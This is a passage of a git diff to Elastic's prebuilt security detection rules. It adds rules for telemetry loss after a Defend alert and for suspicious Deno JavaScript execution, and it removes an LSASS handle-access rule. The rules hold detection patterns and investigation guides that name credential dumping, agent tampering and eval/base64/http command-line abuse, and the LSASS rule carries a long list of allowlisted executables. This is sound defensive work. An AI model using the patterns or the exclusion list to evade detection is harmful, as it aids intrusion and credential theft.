"type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f9abcddc-a05d-4345-a81d-000b79aa5525", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "f9abcddc-a05d-4345-a81d-000b79aa5525_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json b/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json new file mode 100644 index 00000000000..480af0baa36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection.", + "false_positives": [ + "Misconfiguration, system reboot, network issues or expected uninstall of the Elastic Defend agent." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Defend Alert Followed by Telemetry Loss", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Elastic Defend Alert Followed by Telemetry Loss\n\nThis rule identifies situations where an Elastic Defend alert is generated on a host and is not followed by\nany normal endpoint activity events within a short time window. This may indicate agent tampering, sensor\ndisablement, host shutdown, system crash, or defense evasion behavior.\n\n### Possible investigation steps\n\n- Review the original `endpoint.alert` event and identify the detection that triggered the alert.\n- Check the host\u2019s online status, uptime, and reboot history.\n- Verify the health and status of the Elastic Defend agent and related services.\n- Look for evidence of agent tampering, service stops, or security control modifications.\n- Correlate with activity immediately preceding the alert for signs of exploitation or evasion.\n- Determine if similar alert \u2192 silence patterns are occurring on other hosts.\n\n### False positive analysis\n\n- Legitimate system reboots or shutdowns\n- Network connectivity loss\n- Elastic Agent upgrades or restarts\n- Endpoint service crashes\n- Maintenance or IT operations\n\n### Response and remediation\n\n- Validate host and agent availability.\n- Reconnect or re-enroll the agent if telemetry is missing.\n- Isolate the host if malicious activity is suspected.\n- Investigate for security control tampering.\n- Perform broader environment hunting for similar patterns.\n", + "query": "sequence by host.id with maxspan=5m\n [any where event.dataset == \"endpoint.alerts\"]\n ![any where event.category in (\"process\", \"library\", \"registry\", \"network\", \"dns\", \"file\")]\n", + "references": [ + "https://attack.mitre.org/techniques/T1562/001/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "fc552f49-8f1c-409b-90f8-6f5b9869b6c4", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json b/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json new file mode 100644 index 00000000000..24598d392de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious JavaScript Execution via Deno", + "note": "## Triage and analysis\n\n### Investigating Suspicious JavaScript Execution via Deno\n\nDeno is a legitimate JavaScript/TypeScript runtime. This rule fires when a Deno process (identified by name, PE original filename, or code signer \"Deno Land Inc.\") is started with a command line matching suspicious patterns: javascript with base64, eval(, http, or javascript import. Such patterns are commonly used to run inline or remote scripts and can indicate abuse.\n\n### Possible investigation steps\n\n- Review process.command_line and process.args to see the exact script or URL being executed.\n- Identify the parent process and how Deno was launched (user, script, terminal, or other tool).\n- Check whether Deno is approved on the host; if not, treat as potential unauthorized software execution.\n- Correlate with file creation or network events around the same time (downloads, script drops).\n\n### False positive analysis\n\n- Legitimate development or automation that runs Deno with eval, http imports, or base64-encoded snippets may trigger; allowlist by host or command-line pattern where appropriate.\n\n### Response and remediation\n\n- If abuse is confirmed: contain the host, terminate the Deno process, and remove or block Deno if not authorized; investigate how the script was delivered and scope for similar activity.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"deno.exe\" or ?process.pe.original_file_name == \"deno.exe\" or ?process.code_signature.subject_name == \"Deno Land Inc.\") and\n process.command_line : (\"*javascript*base64*\", \"*eval(*\", \"*http*\", \"*javascript*import*\")\n", + "references": [ + "https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat", + "https://deno.com/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ff18d24b-2ba6-4691-a17f-75c4380d0965", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "ff18d24b-2ba6-4691-a17f-75c4380d0965_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json deleted file mode 100644 index d251537890a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_13.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.api-*", - "logs-m365_defender.event-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "LSASS Process Access via Windows API", - "note": "## Triage and analysis\n\n### Investigating LSASS Process Access via Windows API\n\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows component responsible for managing user authentication and security policies. Adversaries may attempt to access the LSASS handle to dump credentials from its memory, which can be used for lateral movement and privilege escalation.\n\nThis rule identifies attempts to access LSASS by monitoring for specific API calls (OpenProcess, OpenThread) targeting the \"lsass.exe\" process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) of the process that accessed the LSASS handle.\n - Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Determine the first time the process executable was seen in the environment and if this behavior happened in the past.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Assess the access rights (`process.Ext.api.parameters.desired_access`field) requested by the process. This [Microsoft documentation](https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights) may be useful to help the interpretation.\n- If there are traces of LSASS memory being successfully dumped, investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of `process.executable`, `process.code_signature.subject_name` and `process.Ext.api.parameters.desired_access_numeric` conditions.\n\n### Related Rules\n\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- Potential Credential Access via DuplicateHandle in LSASS - 02a4576a-7480-4284-9327-548a806b5e48\n- LSASS Memory Dump Handle Access - 208dbe77-01ed-4954-8d44-1e5751cb20de\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "api where host.os.type == \"windows\" and \n process.Ext.api.name in (\"OpenProcess\", \"OpenThread\") and Target.process.name : \"lsass.exe\" and \n not \n (\n process.executable : (\n \"?:\\\\ProgramData\\\\GetSupportService*\\\\Updates\\\\Update_*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Program Files (x86)\\\\Asiainfo Security\\\\OfficeScan Client\\\\NTRTScan.exe\",\n \"?:\\\\Program Files (x86)\\\\Blackpoint\\\\SnapAgent\\\\SnapAgent.exe\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Security\\\\EFR\\\\EFRService.exe\",\n \"?:\\\\Program Files (x86)\\\\CyberCNSAgent\\\\osqueryi.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\vpnagent.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\aciseagent.exe\",\n \"?:\\\\Program Files (x86)\\\\cisco\\\\cisco anyconnect secure mobility client\\\\vpndownloader.exe\",\n \"?:\\\\Program Files (x86)\\\\eScan\\\\reload.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\*\\\\avp.exe\",\n \"?:\\\\Program Files (x86)\\\\microsoft intune management extension\\\\microsoft.management.services.intunewindowsagent.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Reactive\\\\bin\\\\NableReactiveManagement.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Windows Agent\\\\bin\\\\agent.exe\",\n \"?:\\\\Program Files (x86)\\\\Tanium\\\\Tanium Client\\\\TaniumClient.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\\\\CCSF\\\\TmCCSF.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\TMASutility.exe\",\n \"?:\\\\Program Files*\\\\Windows Defender\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Bitdefender\\\\Endpoint Security\\\\EPSecurityService.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\McAfee\\\\AVSolution\\\\mcshield.exe\",\n \"?:\\\\Program Files\\\\EA\\\\AC\\\\EAAntiCheat.GameService.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\agentbeat.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\metricbeat.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\packetbeat.exe\",\n \"?:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiProxy.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiSSLVPNdaemon.exe\",\n \"?:\\\\Program Files\\\\Goverlan Inc\\\\GoverlanAgent\\\\GovAgentx64.exe\",\n \"?:\\\\Program Files\\\\Huntress\\\\HuntressAgent.exe\",\n \"?:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\bin\\\\sbshutdown.exe\",\n \"?:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe\",\n \"?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\*\\\\pmfexe.exe\", \n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Qualys\\\\QualysAgent\\\\QualysAgent.exe\",\n \"?:\\\\Program Files\\\\smart-x\\\\controlupagent\\\\version*\\\\cuagent.exe\",\n \"?:\\\\Program Files\\\\TDAgent\\\\ossec-agent\\\\ossec-agent.exe\",\n \"?:\\\\Program Files\\\\Topaz OFD\\\\Warsaw\\\\core.exe\",\n \"?:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\netagent\\\\tm_netagent.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe\",\n \"?:\\\\Program Files\\\\Windows Defender Advanced Threat Protection\\\\MsSense.exe\",\n \"?:\\\\Program Files\\\\Wise\\\\Wise Memory Optimizer\\\\WiseMemoryOptimzer.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQDeployRunner\\\\*\\\\exec\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostw.exe\",\n \"?:\\\\Windows\\\\System32\\\\RtkAudUService64.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exe\"\n ) and not ?process.code_signature.trusted == false\n )\n", - "references": [ - "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "m365_defender", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Target.process.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.Ext.api.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff4599cb-409f-4910-a239-52e4e6f532ff", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/", - "subtechnique": [ - { - "id": "T1003.001", - "name": "LSASS Memory", - "reference": "https://attack.mitre.org/techniques/T1003/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1106", - "name": "Native API", - "reference": "https://attack.mitre.org/techniques/T1106/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 13 - }, - "id": "ff4599cb-409f-4910-a239-52e4e6f532ff_13", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index 971ba33c31a..e1e8e9d2722 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -21,4 +21,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.19.17 +version: 8.19.18-beta.1